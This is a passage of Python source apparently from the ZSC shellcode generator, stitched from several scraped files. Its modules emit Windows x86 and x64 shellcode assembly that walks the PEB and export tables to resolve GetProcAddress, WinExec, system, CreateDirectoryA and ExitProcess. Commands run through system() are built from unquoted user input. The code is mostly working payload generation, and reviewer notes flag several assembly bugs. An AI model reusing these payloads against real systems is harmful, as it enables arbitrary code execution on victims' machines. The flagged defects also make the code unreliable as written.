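    loads "msvcrt.dll", from which ``system`` and ``exit`` are resolved.

    Previously the instructions were concatenated with no line breaks, so
    the printed text was one unassemblable line. The instruction stream is
    unchanged.
    """

    file_dest = base_module.OptString("", "File Destination")
    data = base_module.OptString("", "File data")

    def generate(self, command) -> str:
        """Return the AT&T assembly text, one instruction per line.

        Args:
            command: assembly (from ``stack.generate``) that pushes the
                command line; %esp afterwards is passed to ``system``.
        """

        def asm(*instructions):
            return "".join(f"{ins}\n" for ins in instructions)

        # PEB walk to kernel32 and scan of its export names for "GetProcAddre".
        # NOTE(review): ``jne 23 <.text+0x23>`` is objdump output and needs a
        # label before GAS will accept it — confirm the assembly step handles it.
        find_getprocaddress = asm(
            "xor    %ecx, %ecx",
            "mov    %fs:0x30(%ecx), %eax",
            "mov    0xc(%eax), %eax",
            "mov    0x14(%eax), %esi",
            "lods   %ds:(%esi), %eax",
            "xchg   %eax, %esi",
            "lods   %ds:(%esi), %eax",
            "mov    0x10(%eax), %ebx",
            "mov    0x3c(%ebx), %edx",
            "add    %ebx, %edx",
            "mov    0x78(%edx), %edx",
            "add    %ebx, %edx",
            "mov    0x20(%edx), %esi",
            "add    %ebx, %esi",
            "xor    %ecx, %ecx",
            "inc    %ecx",
            "lods   %ds:(%esi), %eax",
            "add    %ebx, %eax",
            "cmpl   $0x50746547, (%eax)",
            "jne    23 <.text+0x23>",
            "cmpl   $0x41636f72, 0x4(%eax)",
            "jne    23 <.text+0x23>",
            "cmpl   $0x65726464, 0x8(%eax)",
            "jne    23 <.text+0x23>",
            "mov    0x24(%edx), %esi",
            "add    %ebx, %esi",
            "mov    (%esi, %ecx, 2), %cx",
            "dec    %ecx",
            "mov    0x1c(%edx), %esi",
            "add    %ebx, %esi",
            "mov    (%esi, %ecx, 4), %edx",
            "add    %ebx, %edx",
        )
        # %esi = GetProcAddress. Resolve "LoadLibraryA" ("aryA" "Libr" "Load"),
        # load "msvcrt.dll" ("ll" "rt.d" "msvc"); the handle is kept in %edi.
        load_msvcrt = asm(
            "xor    %esi, %esi",
            "mov    %edx, %esi",
            "xor    %ecx, %ecx",
            "push   %ecx",
            "push   $0x41797261",
            "push   $0x7262694c",
            "push   $0x64616f4c",
            "push   %esp",
            "push   %ebx",
            "call   *%edx",
            "xor    %ecx, %ecx",
            "mov    $0x6c6c, %cx",
            "push   %ecx",
            "push   $0x642e7472",
            "push   $0x6376736d",
            "push   %esp",
            "call   *%eax",
            "xor    %edi, %edi",
            "mov    %eax, %edi",
        )
        # GetProcAddress(msvcrt, "system") ("em" "syst") -> %eax.
        resolve_system = asm(
            "xor    %edx, %edx",
            "push   %edx",
            "mov    $0x6d65, %dx",
            "push   %edx",
            "push   $0x74737973",
            "mov    %esp, %ecx",
            "push   %ecx",
            "push   %edi",
            "xor    %edx, %edx",
            "mov    %esi, %edx",
            "call   *%edx",
        )
        # system(command).
        # NOTE(review): %ecx is zeroed but NOT pushed before the command, so
        # when the command's length is a multiple of 4 the stack helper leaves
        # no NUL terminator and the string runs into the "system" bytes above
        # it (the other Windows modules in this file push %ecx first) — confirm.
        call_system = (
            asm("xor    %ecx, %ecx")
            + command
            + asm("push   %esp", "call   *%eax")
        )
        # GetProcAddress(msvcrt, "exit") then exit(0).
        exit_call = asm(
            "xor    %edx, %edx",
            "push   %edx",
            "push   $0x74697865",
            "mov    %esp, %ecx",
            "push   %ecx",
            "push   %edi",
            "call   *%esi",
            "xor    %ecx, %ecx",
            "push   %ecx",
            "call   *%eax",
        )
        return find_getprocaddress + load_msvcrt + resolve_system + call_system + exit_call

    def run(self) -> None:
        """Build ``echo <data> > <file_dest>`` and print the assembly.

        NOTE(review): ``data``/``file_dest`` are interpolated unquoted into a
        cmd.exe command line, so metacharacters (&, |, >, %) alter it, and
        ``echo`` appends a newline to the written data.
        """
        command = stack.generate(f"echo {self.data} > {self.file_dest}",
                                 "%ecx", "string")
        print(self.generate(command))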
ファイル: exec-intel.py プロジェクト: dmknght/ZSC
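class Module(base_module.BasePayload):
    """Windows/x64 NASM source: WinExec(dest_file, SW_SHOWNORMAL) then ExitProcess(0).

    kernel32 and ntdll are found through the PEB loader list; WinExec and
    ExitProcess are resolved with a ROR-13 hash scan of the export names
    (``GetProcessAddress`` label).

    Two fixes: the lines were concatenated with no line breaks, and ``run``
    fed the output of ``stack.generate(..., "%ecx", "string")`` — AT&T-syntax
    push instructions — into the ``db`` directive, which cannot assemble; the
    program name is now emitted as byte values. The listing itself is
    otherwise unchanged.

    NOTE(review): ``GetProcessAddress`` does its arithmetic with 32-bit
    registers (r13d/r14d/ebx), so it only works if the DLL base is below
    4 GiB; and ``jecxz`` tests ecx while the loop counter is r10d, so a hash
    that never matches underflows r10d instead of exiting — confirm against
    the target OS before relying on this.
    """

    dest_file = base_module.OptString("notepad.exe", "File to execute")

    def generate(self, dest) -> str:
        """Return the NASM listing, one line per entry.

        Args:
            dest: text placed after ``db`` as the program-name bytes (a
                NUL is appended by the following ``db 0x00``).
        """
        lines = [
            "bits 64",
            "section .text",
            "global start",
            "",
            "start:",
            ";get dll base addresses",
            "    sub rsp, 20h                     ;reserve stack space for called functions",
            "    and rsp, 0fffffffffffffff0h      ;make sure stack 16-byte aligned   ",
            "     ",
            "    mov r12, [gs:60h]                ;peb",
            "    mov r12, [r12 + 0x18]            ;Peb --> LDR",
            "    mov r12, [r12 + 0x20]            ;Peb.Ldr.InMemoryOrderModuleList",
            "    mov r12, [r12]                   ;2st entry",
            "    mov r15, [r12 + 0x20]            ;ntdll.dll base address!",
            "    mov r12, [r12]                   ;3nd entry",
            "    mov r12, [r12 + 0x20]            ;kernel32.dll base address!",
            " ",
            ";find address of winexec from kernel32.dll which was found above. ",
            "    mov rdx, 0xe8afe98                ; hash of winexec given to rdx ",
            "    mov rcx, r12                    ; rcx has dll address now",
            "    mov r12, r12",
            "    call GetProcessAddress           ; give arguments in rdx and rcx and get rax back with winexex",
            "     ",
            "; the winexec call",
            "    jmp GetProgramName",
            "",
            "ExecProgram:",
            "    pop rcx                         ;rcx has the handle to the calc.exe string (1st argument)",
            "    mov edx, 1",
            "    call rax",
            "                 ",
            ";ExitProcess",
            "    mov rdx, 0x2d3fcd70                ",
            "    mov rcx, r15",
            "    call GetProcessAddress",
            "    xor  rcx, rcx                  ;uExitCode",
            "    call rax       ",
            "",
            ";get program name",
            "GetProgramName:",
            "    call ExecProgram",
            f"    db {dest}",
            "    db 0x00                            ; null terminated string",
            "",
            ";Hashing section to resolve a function address    ",
            "GetProcessAddress:        ",
            "    mov r13, rcx              ;base address of dll loaded - rdx has winexec, rcx has kernel32 addr",
            "    mov eax, [r13d + 0x3c]           ;skip DOS header and go to PE header",
            "    mov r14d, [r13d + eax + 0x88]    ;0x88 offset from the PE header == the export table. ",
            "    add r14d, r13d             ;make the export table an absolute base address and put it in r14d.",
            "",
            "    mov r10d, [r14d + 0x18]         ;go into the export table and get the numberOfNames ",
            "    mov ebx, [r14d + 0x20]          ;get the AddressOfNames offset. ",
            "    add ebx, r13d                   ;AddressofNames base. ",
            "    ",
            "find_function_loop:    ",
            "    jecxz find_function_finished   ; jump short if ecx == zero. nothing found ",
            "    dec r10d                       ;dec ECX by one for the loop",
            "    mov esi, [ebx + r10d * 4]      ;get a name to  from the export table. ",
            "    add esi, r13d                  ;esi == now the current name to search on. ",
            "    ",
            "find_hashes:",
            "    xor edi, edi",
            "    xor eax, eax",
            "    cld",
            "",
            ";this block computes the hash for whatever == at esi    ",
            "continue_hashing:    ",
            "    lodsb                         ;load byte at ds:esi to al",
            "    test al, al                   ;is the end of string resarched?",
            "    jz compute_hash_finished",
            "    ror dword edi, 0xd            ;ROR13 for hash calculation!",
            "    add edi, eax                    ; edi has the  hash from the hash calculation",
            "    jmp continue_hashing",
            "",
            "; this block checks the hash and then gives back the function loaded at eax    ",
            "compute_hash_finished:",
            "    cmp edi, edx                  ;edx has the function hash (rdx , rcx was passed on from above)",
            "    jnz find_function_loop        ;didn't match, keep trying!",
            "    mov ebx, [r14d + 0x24]        ;put the address of the ordinal table and put it in ebx. ",
            "    add ebx, r13d                 ;absolute address",
            "    xor ecx, ecx                  ;ensure ecx == 0'd. ",
            "    mov cx, [ebx + 2 * r10d]   ;ordinal = 2 bytes. Get the current ordinal and put it in cx."
            " ECX was our counter for which # we were in. ",
            "    mov ebx, [r14d + 0x1c]        ;extract the address table offset",
            "    add ebx, r13d                 ;put absolute address in EBX.",
            "    mov eax, [ebx + 4 * ecx]      ;relative address",
            "    add eax, r13d                    ; eax has the required function given by the hash in rcx",
            "",
            "",
            "find_function_finished:",
            "    ret",
        ]
        return "".join(f"{line}\n" for line in lines)

    def run(self) -> None:
        """Print the listing with ``dest_file`` embedded as the program-name bytes.

        The name is emitted as a comma-separated list of byte values so that
        quotes and other characters need no escaping inside ``db``. It is
        encoded as UTF-8; WinExec takes an ANSI string, so a non-ASCII name
        would need the target's code page instead (TODO). An empty name would
        leave ``db`` with no operand, so it is rejected.
        """
        if not self.dest_file:
            print("; dest_file is required")
            return
        name_bytes = ", ".join(f"0x{b:02x}" for b in self.dest_file.encode("utf-8"))
        print(self.generate(name_bytes))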
ファイル: dir_create.py プロジェクト: dmknght/ZSC
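class Module(base_module.BasePayload):
    """Windows/x86 payload: CreateDirectoryA(dirname, NULL) then ExitProcess(0).

    GetProcAddress is located via the PEB/export-table walk; CreateDirectoryA
    and ExitProcess are resolved from kernel32 by name at run time.

    Previously the instructions were concatenated with no line breaks, so
    the printed text was one unassemblable line. The instruction stream is
    unchanged.
    """

    dirname = base_module.OptString("", "Dir name")  # TODO improve descr

    def generate(self) -> str:
        """Return the AT&T assembly text, one instruction per line."""

        def asm(*instructions):
            return "".join(f"{ins}\n" for ins in instructions)

        # PEB walk to kernel32 and scan of its export names for "GetProcAddre".
        # NOTE(review): ``jne 23 <.text+0x23>`` is objdump output and needs a
        # label before GAS will accept it — confirm the assembly step handles it.
        find_getprocaddress = asm(
            "xor    %ecx, %ecx",
            "mov    %fs:0x30(%ecx), %eax",
            "mov    0xc(%eax), %eax",
            "mov    0x14(%eax), %esi",
            "lods   %ds:(%esi), %eax",
            "xchg   %eax, %esi",
            "lods   %ds:(%esi), %eax",
            "mov    0x10(%eax), %ebx",
            "mov    0x3c(%ebx), %edx",
            "add    %ebx, %edx",
            "mov    0x78(%edx), %edx",
            "add    %ebx, %edx",
            "mov    0x20(%edx), %esi",
            "add    %ebx, %esi",
            "xor    %ecx, %ecx",
            "inc    %ecx",
            "lods   %ds:(%esi), %eax",
            "add    %ebx, %eax",
            "cmpl   $0x50746547, (%eax)",
            "jne    23 <.text+0x23>",
            "cmpl   $0x41636f72, 0x4(%eax)",
            "jne    23 <.text+0x23>",
            "cmpl   $0x65726464, 0x8(%eax)",
            "jne    23 <.text+0x23>",
            "mov    0x24(%edx), %esi",
            "add    %ebx, %esi",
            "mov    (%esi, %ecx, 2), %cx",
            "dec    %ecx",
            "mov    0x1c(%edx), %esi",
            "add    %ebx, %esi",
            "mov    (%esi, %ecx, 4), %edx",
            "add    %ebx, %edx",
        )
        # Save kernel32 base (%ebx) and GetProcAddress (%edx); push
        # "CreateDirectoryA" ("oryA" "rect" "teDi" "Crea") after a zero dword,
        # resolve it, then drop the four string dwords and the terminator.
        resolve_create_directory = asm(
            "push   %ebx",
            "push   %edx",
            "xor    %ecx, %ecx",
            "push   %ecx",
            "push   $0x4179726f",
            "push   $0x74636572",
            "push   $0x69446574",
            "push   $0x61657243",
            "push   %esp",
            "push   %ebx",
            "call   *%edx",
            "add    $0x10, %esp",
            "pop    %ecx",
        )
        # CreateDirectoryA(dirname, NULL): the function pointer is parked on
        # the stack, the name pushed NUL-terminated and its address taken into
        # %ebx. Afterwards %esp is restored by 8 + the name's dword-padded
        # length and the saved GetProcAddress / kernel32 values are popped.
        cleanup = hex(int(8 + 4 * (ceil(len(self.dirname) / float(4)))))
        call_create_directory = (
            asm("push   %eax", "xor    %ecx, %ecx", "push   %ecx")
            + stack.generate(self.dirname, "%ecx", "string")
            + asm(
                "xor    %ebx, %ebx",
                "mov    %esp, %ebx",
                "xor    %ecx, %ecx",
                "push   %ecx",
                "push   %ebx",
                "call   *%eax",
                f"add    ${cleanup}, %esp",
                "pop    %edx",
                "pop    %ebx",
            )
        )
        # ExitProcess(0): "essa" (with 'a' zeroed in place) "Proc" "Exit".
        exit_process = asm(
            "xor    %ecx, %ecx",
            "mov    $0x61737365, %ecx",
            "push   %ecx",
            "subl   $0x61, 0x3(%esp)",
            "push   $0x636f7250",
            "push   $0x74697845",
            "push   %esp",
            "push   %ebx",
            "call   *%edx",
            "xor    %ecx, %ecx",
            "push   %ecx",
            "call   *%eax",
        )
        return find_getprocaddress + resolve_create_directory + call_create_directory + exit_process

    def run(self) -> None:
        """Print the assembly. NOTE(review): an empty dirname is not rejected here."""
        print(self.generate())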
class Obfuscator(base_module.BaseModule):
    method = base_module.OptString("", "Obfuscate method")